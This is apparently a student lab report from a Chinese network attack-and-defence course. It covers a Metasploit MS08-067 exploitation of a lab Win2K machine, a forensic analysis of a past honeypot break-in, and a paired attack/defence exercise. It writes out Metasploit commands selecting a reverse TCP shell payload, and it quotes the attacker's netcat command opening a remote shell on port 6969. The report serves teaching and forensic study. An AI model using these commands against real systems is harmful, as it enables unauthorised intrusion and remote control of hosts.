20212813 2021-2022-2 《网络攻防实践》实践六报告
一、实践内容
本次实验开始进入系统安全攻防部分,在利用各种工具充分收集信息之后,我们可以了解到目标网络中存在哪
络协议攻击技术、哪些类型的主机系统、系统上开放者何种网络服务、存在哪些安全漏
洞等。下一步,我们就需要通过破解弱口令、利用网络服务安全漏洞实施远程渗透
攻击,访
问目标主机访问权限,进一步寻求系统的特权用户权限,以至于在完全控制目标主机系之后在上面为所欲为;窃取用户的敏感信息,植入后门程序,清除攻击入侵痕达成攻击目标之后全身而退
。
目前Windows远程攻击技术可以分为以下几大类:
- 远程口令猜测与破解攻击∶远程渗透攻击Windows系统最简单的方法仍然是猜测或破解出系统的登录口令,从Windows 操作系统诞生以来一直存在的口令暴力破解、基于字典的猜测以及中间人身份认证欺骗攻击技术,仍对现在的Windows网络构成现实的威胁。
- 攻击Windows网络服务∶无论Windows自身独有的SMB、MSRPC、NETBIOS等网络服务,还是IIS、MS SQL等各种互联网服务在Windows系统上的具体服务实例,都不可避免地存在着可导致远程代码执行的高危性安全漏洞,攻击者也一直在利用这些漏洞来对 Windows 网络服务实施远程渗透攻击,从而得到 Windows 系统的访问权。
- 攻击 Windows 客户端及用户∶最近几年来在微软公司 Windows XP/Vista/Windows7等操作系统的开发过程中,都应用了SDL安全软件开发生命周期,从而有效地提升了Windows系统及本身服务的安全性,同时引入了DEP数据执行保护、ASLR地址空间布局随机化机制、UAC用户账户控制等安全特性,这都使得攻击者越来越难以利用传统的攻击渠道来远程攻陷Windows系统。
本次实验的渗透工具:Metasploit
Metasploit是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。Metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。详细使用可以参考《Metasploit渗透测试指南》
二、实践过程
1、动手实践Metasploit windows attacker
- 任务:使用metasploit软件进行windows远程渗透统计实验
- 具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
本次使用的攻击机为Kali(IP:192.168.13.8),靶机为Win2KServer(IP:192.168.13.9),且配置在了同一个网段下(都使用NAT模式),连通性测试如下图所示:
直接打开Metasploit:
输入search MS08_067查看该漏洞信息:
输入use exploit/windows/smb/ms08_067_netapi使用相关攻击脚本,使用show payloads显示可用的攻击负载,set payload generic/shell_reverse_tcp选择你要用的攻击负载模块:
使用show options查看需要设置的参数:
使用set RHOST 192.168.13.9设置靶机为win2k,set LHOST 192.168.13.8设置攻击机为kali,再show options查看是否配置成功,如图:
输入exploit开始攻击,要注意目标主机的445端口要开放,查看445端口是否开放之后,如果没有开放,则需要开启445端口。攻击成功之后输入若干命令进行测试:
可以使用Wireshark捕获攻击过程产生的数据包:
2、取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
使用wireshark打开snort-0204@0117.log,大致浏览文件后,可以发现日志文件由以下内容组成:
- 可识别的HTTP协议内容
- 可识别的SQL语言代码内容
- 可识别的系统操作代码内容
- 不可识别的数据(二进制数据)
(1)攻击者使用了什么破解工具进行攻击
问题解答:攻击者利用了Unicode攻击(针对MS00-078/MS01-026)和针对msadcs.dll中RDS漏洞(MS02-065)的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。
分析:
追踪HTTP数据流,可以找到特殊字符%C0%AF,在Unicode编码中对应符号/,因此可以推测存在UNICODE编码漏洞攻击,说明攻击者通过IIS Unicode漏洞了解了被攻击主机操作系统的一些基本情况:
再往下,可以看到攻击者试图向服务器获取一个msadcs.dll文件:
攻击者利用这个dll存在RDS漏洞,输入了个数据查询语句进行SQL注入攻击。根据“ADM!ROX!YOUR!WORLD”特征字符串,以及查询语句中使用了dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb,通过查询可以知道到它是由rain forest puppy 编写的 msadc(2).pl渗透攻击代码发起的。
至此,攻击者通过查点确认了目标系统提供 Web 服务的是IIS v4.0,并存在Unicode和RDS安全漏洞,可进行进一步渗透攻击。
(2)攻击者如何使用这个破解工具进入并控制了系统
观察到每次 RDS 渗透攻击间的间隔时间均为 6秒左右,可以推测攻击者是预先写好需执行的 shell 指令列表,然后由 msadc(2).pl 渗透攻击工具一起执行。
可以发现攻击者并没有成功,之后便又开始转向 Unicode 攻击,每条请求间隔时间大概在 10-12 秒,意味着指令可能是由攻击者手工输入的,如图:
攻击者就成功进入了系统之后,继续往下看,可以发现攻击者建立了一个ftp连接,但是可以看到请求间隔时间大概在 10-12 秒,意味着这些指令可能是由攻击者手工输入的,而且输入了多次才输入正确。
蜜罐主机连接 213.116.251.162 并下载了所指定的这些文件,并通过 nc构建其一个远程 shell 通道。cmd1.exe /c nc -l -p 6969 -e cmd1.exe接着,攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。
(3)攻击者获得系统访问权限后做了什么(4238-5537)
从下图的tcp流可以看到攻击者的行为:
-
对目标主机的文件系统进行了嗅探并删除了一些文件:
-
尝试在根目录下创建rdisk,但是没有成功;
-
并试图通过删除SAM数据库中的数据(拷贝和删除har.txt)和将自己加到管理员组中的方式来实现提升自己访问权限的目的;
(4)我们如何防止这样的攻击
这个攻击事件中被利用的两个漏洞为RDS和Unicode漏洞,两者都已经有相应的补丁,通过打补丁可防止遭受同样的攻击。不要使用 IIS4.x 这样臭名昭著的 Web Server,如果必须使用 IIS4.x,主要的防范措施有:
- 为这些漏洞打上补丁,
- 禁用用不着的 RDS 等服务,
- 防火墙封禁网络内部服务器发起的连接
- 为 web server 在单独的文件卷上设置虚拟根目录
- 使用 NTFS 文件系统,因为 FAT 几乎不提供安全功能
- 使用 IIS Lockdown 和 URLScan 等工具加强 web server
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
攻击者意识到了攻击目标是蜜罐主机,因为他建立了一个文件,并输入了如下内容 C:>echo best honeypot i've seen till now :) > rfp.txt.
因为该目标主机作为 rfp 的个人网站, Web 服务所使用的 IIS 甚至没有更新 rfp 自己所发现的 MDAC RDS安全漏洞,很容易让攻击者意识到这绝对是台诱饵。
3、团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
本次攻防实践和20212821Lxw同学一起进行,相关主机均设置为桥接模式,并连接在同一个局域网之下,以模拟实际情况,相关IP地址如下:
| 本地攻击机IP | 本地靶机IP | 对方攻击机IP | 对方靶机IP |
|---|---|---|---|
| 192.168.1.109 | 192.168.1.110 | 192.168.1.105 | 192.168.1.114 |
| Kali | Win2KServer | Kali | WinXP |
(1)攻击实践
作为攻击方,攻击机IP为192.168.1.109,首先测试与目标主机的连通性,没有问题:
之后按照实验1的步骤,加载漏洞模块、设置负载、源IP、目的IP,然后发起进攻:
攻击成功后,查看了靶机IP地址,然后创建了一个名为zzx文件夹以简单“告知”Lxw。
(2)防守实践
作为防守方,除了要被动等待收割以外,还需要打开Wireshark捕获攻击过程的数据包:
本地攻击中,攻击方利用Win2KServer存在的MS08-067漏洞进行渗透,对方IP地址为192.168.1.105,攻击完成后,
简单分析一下数据包,首先攻击机与本地靶机的445端口建立连接(中间本地靶机还用ARP查找攻击机的MAC地址):
之后是一些SMB协议数据包:
最后当对方取得控制权后,通过追踪流后面的TCP数据包可以看到对方在本地靶机上先是查看了IP,然后创建了一个文件夹,之后便结束了本次攻击:
三、学习中遇到的问题及解决
- 问题1:实验1中总是攻击不成功
- 问题1解决方案:按照之前的配置,攻击机使用NAT模式,靶机使用仅主机模式,处于不同网段,之后将两台主机调整为同一网段之后便可以进行攻击。
四、实践总结
本次实验动手实践了使用msf渗透主机的过程,了解了这个工具的使用,也仔细分析了一次成功的NT系统破解攻击,帮助自己理解了攻击过程。
